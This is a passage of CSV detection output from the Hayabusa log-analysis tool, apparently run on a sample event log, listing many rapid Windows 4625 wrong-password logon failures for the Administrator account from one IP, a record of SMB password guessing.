NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.735 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.837 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.930 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.019 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.062 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.100 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.142 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.230 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.501 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.809 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.863 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.911 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.086 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.142 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.343 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.554 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.647 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.837 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.913 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.994 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.206 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.707 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.753 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.800 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.854 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.030 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.175 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | 